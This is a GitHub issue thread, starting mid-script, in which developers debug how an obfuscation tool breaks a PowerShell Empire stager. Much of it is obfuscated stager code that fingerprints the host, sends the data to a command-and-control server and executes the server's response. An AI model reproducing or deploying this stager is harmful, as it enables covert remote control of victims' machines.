)."VA`LuE"::"u`SEma`ChIne`KEys`T`OrE";${rs} = NeW-OBjECT ("{13}{10}{7}{8}{3}{11}{6}{5}{14}{4}{0}{12}{1}{2}{9}"-f 'yPTOSErvi','Ovi','de','C','ACR','p','Y','C','URITY.','r','M.SE','r','cEPR','SYsTe','TogRAPHY.RS') -ARGUMentLIST 2048,${c`sP};${R`k}=${Rs}."T`o`xmLstrINg"(${fAL`SE});${i`D}=-join("ABCDEFGHKLMNPRSTUVWXYZ123456789"."tOC`h`ARaRR`AY"()|Get-Random 
-Count 8);${I`B}=${E}."Ge`Tby`Tes"(${rK});${e`B}=${I`V}+${a`ES}."C`ReAtee`NCrYP`ToR"()."TRansFoR`Mfi`Na`lbLo`CK"(${Ib},0,${iB}."leNG`Th");${EB}=${e`B}+${H`mAc}."cOMpU`TEHa`sH"(${E`B})[0..9];if(-NoT ${WC}) {${Wc}=NeW-OBjeCt ("{4}{1}{2}{3}{0}"-f 'iEnt','YSTEM.N','Et.W','ebCl','S');${W`c}."P`ROxy" =  (GEt-VaRIABLe  ("{0}{1}" -f'3E1','s')  -vAlu  )::"Ge`TsysTEMWE`B`p`RO`XY"();${W`c}."pr`OXy"."cRED`enT`IALS" =  ${9`Px}::"DeF`Au`ltCrE`DEN`TiaLs";}if (${C`u`Stom`heAders} -ne "") {${HE`A`dErs} = ${c`u`sT`OMHea`DErS} -SpLIt ',';${he`A`DERs} | FOREACH-OBjEcT {${HeA`DeR`KeY} = ${_}."s`PlIT"(':')[0];${he`Ad`eRvAl`ue} = ${_}."sPL`It"(':')[1];${wC}."HEA`d`eRS"."A`DD"(${hEAdEr`k`ey}, ${h`eADerv`ALUE});}}${WC}."He`ADErs"."A`dD"("User-Agent",${U`A});${Iv}= (gcI ("Va"+"Ri"+"aBLE:h4ys"+"F")  )."vAl`UE"::"g`eTbyt`eS"($(GeT-RandOm));${d`Ata} = ${e}."gEtBY`TeS"(${i`d}) + @(0X01,0x02,0X00,0X00) +  ( GeT-vARIAbLE ("{0}{1}" -f'H4y','sF') )."VAl`Ue"::"G`ETbYT`Es"(${EB}."L`ENgtH");${Rc`4P} = CONVertTO-RC4BYTeStrEam -RCK $(${IV}+${S`Kb}) -IN ${da`TA};${Rc`4P} = ${iv} + ${RC`4P} + ${E`B};${r`AW}=${wc}."UPLO`AddA`Ta"(${S}+"/news.php","POST",${RC`4P});${D`e}=${e}."gETsTR`ing"(${R`S}."DeCR`Ypt"(${r`AW},${fA`L`Se}));${nO`NCe}=${DE}[0..15] -JOiN '';${k`EY}=${D`E}[16..${dE}."lEn`G`Th"] -JoIn '';${NON`CE}=[String]([LONG]${n`o`NCe} + 1);${a`Es}=NEw-ObjeCt ("{9}{0}{3}{2}{10}{4}{5}{6}{8}{1}{7}"-f'T','ovID','cuRI','EM.SE','rApHy','.A','EsCrypToSERvIce','eR','PR','SYS','TY.CRypTog');${I`V} = [BYtE] 0..255 | Get-RANdOM -COuNT 16;${a`es}."Mo`De"="CBC";${a`es}."K`ey"=${E}."G`etbyTEs"(${k`Ey});${a`es}."iv" = ${i`V};${i}=${NO`N`cE}+'|'+${S}+'|'+ ( Dir  ("{2}{3}{0}{1}"-f'iABlE:2KU9','av','va','R')  )."v`ALue"::"usERdo`maI`N`NaMe"+'|'+  (  GCI  ('vArIABL'+'E:2'+'k'+'U9aV') )."v`ALUe"::"US`Ern`AMe"+'|'+  (  VARiAbLe ("{0}{1}"-f'2','ku9aV')  )."vA`lUE"::"MAch`iNen`A`ME";${p}=(gwMi ("{2}{5}{4}{6}{0}{1}{3}{7}"-f 'ra','Ti','WIN32_NeTWO','o','f','RKAdapTERCon','IGu','N')|WHeRE{${_}."I`padDRe`Ss"}|SeLECT -ExPAnD 
("{1}{2}{0}"-f 'S','IPADD','ReS'));${I`P} = @{${t`RUe}=${p}[0];${f`AlSE}=${P}}[${p}."LEng`TH" -Lt 6];iF(!${i`P} -or ${I`P}."t`Rim"() -Eq '') {${I`p}='0.0.0.0'};${i}+="|$ip";${i}+='|'+(GeT-WMIObjECT ("{3}{1}{0}{2}{4}" -f's','RATInGSy','te','WiN32_Ope','m'))."n`Ame"."SpL`it"('|')[0];if((  ( gET-vaRiAbLE  ("{0}{1}" -f '2ku9','AV') -VALUEOnLy)::"uSE`RNA`Me")."t`O`LoweR"() -eq "system"){${I}+="|True"}else {${I} += '|' +([Security.Principal.WindowsPrincipal]   ( GCI  ("{4}{1}{0}{2}{3}" -f 'aBlE:5','i','2','F6Z4','vAr') )."va`lUe"::"GeTcUR`R`ENT"())."isiNr`O`le"([Security.Principal.WindowsBuiltInRole] "Administrator")}${N}= ${r`Sj}::"geT`c`uRren`Tp`ROCEsS"();${i}+='|'+${n}."PROCES`SnA`ME"+'|'+${n}."iD";${I} += "|powershell|" + ${PS`Ve`RsiOn`T`AbLE}."ps`Ve`RsIoN"."MaJ`OR";${I`B2}=${e}."ge`TBYt`es"(${I});${e`B2}=${I`V}+${A`es}."crE`AT`e`EnCrY`Ptor"()."T`R`AnSformFiNA`Lb`LOCK"(${i`B2},0,${i`B2}."L`eNgth");${hm`Ac}."k`ey" = ${E}."G`E`TByTes"(${k`EY});${E`B2} = ${E`B2}+${hM`Ac}."cOmpUT`E`HaSh"(${E`B2})[0..9];${I`V2}=  ${h`4y`sF}::"G`etBYt`eS"($(Get-RaNDOM));${D`Ata2} = ${e}."GE`Tbyt`eS"(${i`d}) + @(0x01,0X03,0x00,0x00) +  ( GET-vArIabLe  ('H4y'+'SF')  -Valueo  )::"gE`T`ByTes"(${E`B2}."LE`N`GTh");${r`c4P2} = CoNvERTTO-RC4BYTEStrEam -RCK $(${I`V2}+${S`Kb}) -IN ${D`At`A2};${Rc`4p2} = ${I`V2} + ${r`C4`p2} + ${e`B2};if (${cU`sT`o`MheA`DErs} -ne "") {${Hea`DE`RS} = ${CUsto`mh`EAdERS} -SpLIT ',';${hea`derS} | ForEAcH-ObJECT {${HeA`Derk`EY} = ${_}."S`PLIt"(':')[0];${HeA`d`eRv`ALUE} = ${_}."s`Plit"(':')[1];${Wc}."HeaDE`RS"."A`dd"(${h`ea`d`eRKEY}, ${h`e`AD`eRVAlUe});}}${wC}."hE`A`derS"."a`Dd"("User-Agent",${U`A});${R`AW}=${W`C}."U`PL`oAddA`TA"(${s}+"/login/process.php","POST",${R`C4P2});IEX $( ${E}."gET`StrI`NG"($(DECRYpT-BYTes -KEy ${k`Ey} -In ${R`AW})) );${a`es}=${Nu`LL};${s2}=${N`ULL};${WC}=${N`ull};${E`B2}=${NU`ll};${R`AW}=${N`uLl};${iv}=${nu`LL};${W`c}=${n`ull};${i}=${nU`ll};${i`B2}=${N`Ull};  ( geT-vaRIaBLe  ("{1}{0}"-f 'c0A','j'))."VAL`ue"::"cO`Ll`eCt"();Invoke-Empire -Servers 
@((${S} -split "/")[0..2] -join "/") -StagingKey ${SK} -SessionKey ${K`Ey} -SessionID ${i`D};}Start-Negotiate -s "$ser" -SK '3c6e0b8a9c15224a8228b9a98ca1531d' -UA ${U};

I'll be doing some more research into this and see if I can get you some more output when the obfuscated script is actually executing. I thought I would go ahead and post to see if you are able to spot anything that stands out to you.

danielbohannon commented 7 years ago

If you can provide any error details then that would be helpful as well. Thanks man!

cobbr commented 7 years ago

I have a (slightly) minimized version of an obfuscated stager that reproduces part of the issue. The issue appears to be with the $S variable being cast to a byte array type inside of the ConvertTo-RC4ByteStream function. Within the calling function, $S is defined as a string. In the non-obfuscated version of the script, $S remains a string in the calling function after calling ConvertTo-RC4ByteStream. In the following obfuscated version of the script, $S becomes a byte array in the calling function after calling ConvertTo-RC4ByteStream:

 .("{1}{0}" -f 'et','S') ("{0}{1}" -f'b8','hR')  ( [typE]("{3}{0}{4}{1}{2}"-f 'eC','S','semblY','ReFL','TIOn.A'))  ;
 ${a`q`3DN}  =  [TYPe]("{2}{0}{3}{1}"-F 'Y','t.EnCODInG','s','STEM.tex');
 &("{0}{1}{3}{2}"-f'seT','-','iABle','VAR')  ("{0}{1}" -f 'Ua2','4')  ( [TYPe]("{1}{4}{6}{7}{8}{0}{2}{3}{5}{9}" -f'OGrAp','syst','Hy.','C','Em','spPROVid','.Se','cURITy.C','Rypt','eRfLagS'));   
 &('Sv') ("{0}{1}" -f 'vm','D') ( [tyPE]("{3}{1}{2}{4}{5}{0}"-F 'St','sT','eM.nET.w','SY','Eb','RequE') );
 .("{1}{2}{0}"-f 'TEm','S','ET-I')  ("VAriAbL"+"e"+":GPh5")  (  [tyPE]("{6}{2}{5}{7}{0}{3}{1}{4}"-f'nT','ach','sTEm.','iALC','E','nET','SY','.cREDe')  ) ;
 .("{1}{0}{2}"-f 'V','seT-','ariAbLe') ("{0}{1}"-f '1','nMD') ( [tyPE]("{2}{3}{0}{1}"-f'Men','t','E','NViRoN'))  ;
 ${G`D`TLr3} =  [Type]("{1}{7}{2}{3}{4}{5}{0}{6}" -F 'iNDOW','sE','priN','Cip','AL','.w','SIDENtity','CURiTy.')  ;
 &("{0}{1}{2}"-f'S','ET-IT','EM') ("{2}{1}{0}{3}" -f ':','iabLE','vAR','8DB') ( [TypE]("{4}{3}{2}{1}{0}{5}"-f'rO','.P','cs','.DiAGnoStI','System','CESS')  )  ;
 .("{0}{1}"-f'Set-','ITem')  ('varI'+'ABLE:wb'+'Z'+'7o'+'d')  ([TYPE]("{0}{2}{1}{3}"-f 'B','tCOnvErtE','i','r')  )  ;
 ${4Sm`g9}  = [type]('Gc') ;
 fUncTION staRt`-NEGO`TI`ATE {
    PARam(${S},${Sk},${uA}=("{0}{16}{5}{6}{14}{2}{13}{12}{1}{3}{11}{9}{17}{7}{15}{10}{4}{8}" -f 'MoZIlLa/5.','OW6','S NT 6.1','4; TrI',' GeCK',' ','(WI','R','O','.0',':11.0) LikE','dENT/7',' W',';','NdoW','V','0','; '))
    Write-Host s value at start of start-negotiate: $s
    FunCtiOn cOnveRTto`-RC4By`TeS`Tr`eAm {
        ParAM (${R`CK}, ${iN})bEgIN {
            Write-Host s type at start of convertto-rc4bytestream: $S.GetTYpe();
            [BYTE[]] ${S} = 0..255;${J} = 0;
            Write-Host s type after cast in convertto-rc4bytestream: $S.GetType();
            0..255 | .("{1}{0}{2}{3}"-f 'Ea','FOR','ch-Ob','jecT') {
                ${J} = (${J} + ${S}[${_}] + ${r`ck}[${_} % ${r`Ck}."LEN`Gth"]) % 256;
                ${S}[${_}], ${S}[${j}] = ${S}[${J}], ${S}[${_}];
            };
            ${i} = ${J} = 0;
        }
        ProCESs {
            FoREAch(${B`yte} In ${iN}) {
                ${i} = (${i} + 1) % 256;
                ${j} = (${j} + ${S}[${I}]) % 256;
                ${s}[${I}], ${s}[${j}] = ${s}[${J}], ${S}[${i}];
                ${by`Te} -BXOR ${s}[(${S}[${i}] + ${S}[${j}]) % 256];
            }
        }
    }
    ${ErrO`R`AcT`ioNp`REFE`REncE} = ("{4}{2}{3}{0}{1}" -f 'tin','ue','n','tlyCon','Sile');
    ${E}= ( &("{2}{0}{1}" -f'ri','aBLe','vA') ("{0}{1}" -f 'Aq','3dn') -vALUEOn)::"a`sciI";
    ${cUS`TOm`HEAd`eRs} = "";
    ${S`KB}=${e}.("{0}{2}{1}"-f'G','es','ETByt').Invoke(${sk});${A`eS}=.("{0}{1}{2}" -f 'Ne','W','-OBJECt') ("{10}{11}{6}{5}{1}{13}{2}{0}{9}{12}{7}{4}{3}{8}"-f 'PToGra','y.','RY','OVi','vicEPr','Rit','em.SeCU','ypTOSER','der','phY.A','S','ysT','eSCR','C');
    ${i`V} = [BYTe] 0..255 | .("{2}{0}{1}"-f 'E','T-RANDOM','G') -cOUnt 16;
    ${A`es}."m`oDe"="CBC";
    ${A`Es}."k`ey"=${s`KB};
    ${A`Es}."iv" = ${iV};
    ${h`mac} = &("{0}{1}{2}"-f 'NEw-Obje','C','T') ("{9}{4}{5}{2}{1}{7}{8}{0}{6}{3}"-f 'HMACSH','eCuriTy.CryPt','S','6','St','Em.','A25','ogRa','phy.','Sy');
    ${hm`AC}."k`ey" = ${S`KB};${C`Sp} = .("{3}{2}{1}{0}"-f't','bJec','EW-O','N') ("{8}{1}{3}{9}{0}{5}{7}{6}{2}{4}"-f'RyPT','Em','am','.Secu','eTeRS','Ograp','PAR','Hy.CsP','SYst','RIty.C');${c`sp}."F`laGS" = ${C`sP}."fLA`Gs" -BOR   ${Ua`24}::"U`SEm`AChinEkE`ySToRe";
    ${r`S} = .("{3}{2}{1}{0}"-f 'CT','jE','-OB','New') ("{6}{3}{2}{1}{0}{4}{8}{7}{9}{5}"-f 'A','GR','.SEcurITy.CrYPTO','ysTEM','P','dEr','S','ACRY','Hy.RS','PtoSErVIcEPrOVI') -ARGuMEntLisT 2048,${C`SP};
    ${Rk}=${R`s}.("{2}{3}{0}{1}" -f'mLStr','INg','T','OX').Invoke(${Fal`SE});
    ${iD}=-join(("{2}{3}{0}{1}{6}{5}{4}"-f 'NPRSTU','VWXY','ABCDEFG','HKLM','89','234567','Z1').("{1}{0}{2}" -f 'rA','ToCha','rray').Invoke()|.("{2}{0}{1}" -f'do','m','Get-Ran') -Count 8);
    ${iB}=${E}.("{1}{0}{2}"-f 'e','GeTbyT','S').Invoke(${R`k});${e`B}=${I`V}+${a`Es}.("{1}{0}{2}{3}"-f 'NC','CREATeE','RypTO','r').Invoke().("{0}{3}{1}{5}{4}{2}" -f'TrAN','O','AlBLocK','sf','FIn','rM').Invoke(${IB},0,${I`B}."L`ENg`TH");
    ${e`B}=${eB}+${Hm`AC}.("{1}{0}{2}" -f'pU','COM','TeHAsH').Invoke(${eb})[0..9];
    iF(-NOt ${W`c}) {${W`C}=.("{1}{0}{2}" -f 'bJ','NeW-O','eCT') ("{4}{0}{1}{2}{3}"-f'STE','m.N','ET.WeBCL','iEnT','SY');
    ${Wc}."pR`oXY" =   ${v`Md}::("{3}{4}{1}{0}{2}" -f 'O','bPr','XY','GetSYStEM','We').Invoke();
    ${wC}."PR`Oxy"."cre`DEN`TIALS" =  ${GP`H5}::"DefAuLtcreDE`N`Ti`ALS";}
    ${wc}."H`E`ADERS".("{0}{1}"-f'Ad','d').Invoke(("{2}{0}{1}"-f 'r-A','gent','Use'),${U`A});
    ${I`V}=  ${wBZ`7`od}::("{1}{2}{0}"-f 'TeS','GetB','y').Invoke($(&("{1}{3}{0}{2}" -f 'Nd','Get-R','oM','a')));
    ${d`AtA} = ${e}.("{0}{1}" -f 'GETbYTE','s').Invoke(${iD}) + @(0X01,0X02,0x00,0x00) +  ${wbZ7`od}::("{1}{0}" -f'BYtES','GET').Invoke(${eB}."L`enGTH");
    ${R`C4p} = .("{3}{6}{0}{5}{1}{2}{4}"-f 'TT','-RC4BytES','TreA','COn','m','O','VEr') -RCK $(${iV}+${s`kB}) -In ${DA`TA};
    ${w`c}."H`e`AdeRS".("{1}{0}" -f'dd','A').Invoke(("{2}{1}{0}"-f 'nt','r-Age','Use'),${ua});
    Write-Host value of s at end of start-negotiate: $S
    $S = 'http://10.100.100.3:80'
    Write-Host type of s at end of start-negotiate: $S.GetType();
    $one = ${S}+("{2}{1}{3}{0}"-f '.php','in/pr','/log','ocess')
    $two = ("{0}{1}"-f'POS','T')
    $three = ${rC`4P2}
    ${r`AW}=${WC}.("{0}{1}{3}{2}"-f 'Uploa','d','a','Dat').Invoke($one,$two,$three);
    ${A`es}=${n`ULL};${S2}=${n`ULL};${WC}=${nu`lL};${E`B2}=${N`Ull};${R`Aw}=${Nu`Ll};
    ${i`V}=${nU`ll};${WC}=${n`ULl};${I}=${n`uLL};${i`B2}=${nu`Ll};
    ${4`SmG9}::("{0}{1}" -f 'CO','llEcT').Invoke();
    &("{2}{1}{0}{3}" -f 'e-E','ok','Inv','mpire') -Servers @((${S} -split "/")[0..2] -join "/") -StagingKey ${s`K} -SessionKey ${K`Ey} -SessionID ${Id};
}
  $ser='http://10.100.100.3:80'
  .("{3}{0}{2}{1}" -f'-Negot','ate','i','Start') -s "$ser" -SK ("{6}{1}{5}{4}{9}{8}{0}{7}{3}{2}"-f '&:','!+fk','x/h','o>S','VAr','8ZH<','16','s-9,','mb=G','u0z') -UA ${u};

Here is the output of that script, which shows how $S has become a byte array:

PS> ".\stage.ps1" | iex
s value at start of start-negotiate: http://10.100.100.3:80
s type at start of convertto-rc4bytestream: System.String
s type after cast in convertto-rc4bytestream: System.Byte[]
value of s at end of start-negotiate: 88 148 170 19 227 179 206 156 132 225 178 84 171 124 209 23 173 102 10 71 22 98 32
 184 129 73 214 30 68 188 80 163 90 175 28 139 213 251 94 142 248 27 17 95 121 5 152 34 62 66 50 182 93 2 87 70 154 167
151 234 15 136 122 112 145 37 63 60 79 114 46 252 26 194 72 196 35 134 75 138 31 39 246 197 97 242 158 6 107 81 144 24 1
25 41 133 159 54 164 205 25 9 76 45 103 165 236 29 47 12 254 44 7 104 92 91 140 237 186 3 100 48 216 116 203 135 245 115
 52 57 220 210 187 69 208 137 33 195 110 241 153 49 128 96 172 218 1 217 222 221 67 160 130 106 249 36 113 89 223 117 24
0 16 244 14 42 224 231 243 21 226 108 168 191 58 109 78 119 131 64 211 192 77 4 183 207 149 157 141 198 111 228 201 123
238 176 250 199 253 20 43 59 162 204 83 215 120 8 86 65 185 40 55 247 212 255 127 193 85 118 230 174 82 155 180 0 74 181
 53 229 101 233 202 38 51 61 166 126 143 219 13 189 232 235 200 150 147 161 146 18 11 190 99 105 56 169 177 239
type of s at end of start-negotiate: System.Byte[]

I can solve this by changing the name of the $S variable to something else within ConvertTo-RC4ByteStream, but it seems that if this works as-is unobfuscated, it should work obfuscated as well.

This appears to be a problem with command TOKEN obfuscation, because this is solved by disabling it.

There seems to be an additional problem with string TOKEN obfuscation when trying to obfuscate the stager, but I think it is a separate issue from the command TOKEN issue discussed here.
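The trace above shows the nested function's typed `$S` surviving into Start-Negotiate, which is what PowerShell's dot-source operator (`.`) does: the callee runs in the caller's scope instead of a child scope, so its assignments replace the caller's variables. In the minimized script the command-token-obfuscated call to ConvertTo-RC4ByteStream is written as `.("...")` rather than `&("...")`. The following is an added example, not code from the issue or from Invoke-Obfuscation; the function names Start-Demo and Get-KeyStream are invented, and it runs the same assignment pattern through both operators:

```powershell
# Added example (not from the issue). Demonstrates why a nested function's
# "[byte[]] $S = 0..255" can overwrite the caller's $S when the function is
# dot-sourced instead of called with the call operator.
function Start-Demo {
    param($S = 'http://placeholder.invalid')   # string, like the stager's -s argument

    function Get-KeyStream {
        param($Key)
        # Same pattern as the RC4 key-schedule setup: a type-constrained local named $S.
        [byte[]] $S = 0..255
        $S.Length
    }

    # Call operator: Get-KeyStream runs in its own child scope, so the caller's $S is untouched.
    $null = & Get-KeyStream -Key 'k'
    Write-Output ("after '&': S is {0}" -f $S.GetType().Name)   # String

    # Dot-source operator: the body runs in the current scope, so its [byte[]] $S replaces ours.
    $null = . Get-KeyStream -Key 'k'
    Write-Output ("after '.': S is {0}" -f $S.GetType().Name)   # Byte[]

    # Anything built from $S after this point (e.g. $S + '/news.php') now operates on a byte array.
}

Start-Demo
```

The same distinction applies when the command name is produced by a format string: `.("Get-KeyStream")` dot-sources, `&("Get-KeyStream")` calls.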

cobbr commented 7 years ago

So this one was especially fun to debug, but I think I nailed down the issue. The problem appears when using the 'Invoke' style command token obfuscation. If the argument passed to the Invoke() function is a byte array, for some reason it's interpreted as an array of parameters instead of a single parameter that is an array.

To me, this seems like an actual issue with PowerShell itself, as this doesn't seem to happen with any other type of array besides byte arrays. But aside from a fix to PowerShell, a way to fix this is passing the byte array with this notation: "Method".Invoke(@(,$byteArrayVar)).

I'm a little uncertain on how to implement that in Invoke-Obfuscation as you would have to have some sort of 'state' where we could detect a byte array as the next token while doing Invoke style obfuscation on command tokens. You might have some more insight on how best to implement a long-term fix, being more familiar with the code base. For now, I hacked in some exceptions for method names that take byte arrays as parameters and were giving me trouble:

    # Parse out $SubSubString to make next If block a little cleaner for handling fringe cases in which we will revert to ticks instead of concatenation or reordering of the Member token value.
    $SubSubString = $ScriptString.SubString($Token.Start+$Token.Length,$RemainingSubString)

    If(($Token.Content.ToLower() -eq 'invoke') `
    -OR ($Token.Content.ToLower() -eq 'computehash') `
    -OR ($Token.Content.ToLower() -eq 'tobase64string') `
    -OR ($Token.Content.ToLower() -eq 'tostring') `
    -OR (((($Token.Start -gt 0) -AND ($ScriptString.SubString($Token.Start-1,1) -eq '.')) `
    -OR (($Token.Start -gt 1) -AND ($ScriptString.SubString($Token.Start-2,2) -eq '::'))) `
    -AND (($ScriptString.Length -ge $Token.Start+$Token.Length+1) -AND (($SubSubString.SubString(0,1) -ne '(') -OR (($SubSubString.Contains('[')) -AND !($SubSubString.SubString(0,$SubSubString.IndexOf('[')).Contains(')')))))))
    {
        # We will use the scriptString length prior to obfuscating 'invoke' to help extract this token after obfuscation so we can add quotes before re-inserting it.
        $PrevLength = $ScriptString.Length

cobbr commented 6 years ago

Not a real 'fix' but hacky exceptions included in: 950785e5f846fb0e8d3be8484d2ba466c2340469

danielbohannon commented 6 years ago

Thanks for the fix, @cobbr!